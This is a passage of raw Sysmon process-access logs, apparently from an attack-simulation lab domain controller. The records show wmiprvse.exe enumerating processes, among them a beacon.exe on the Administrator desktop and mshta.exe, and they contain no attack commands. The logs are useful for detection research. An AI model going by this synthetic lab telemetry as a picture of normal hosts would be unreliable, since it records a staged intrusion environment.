indows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 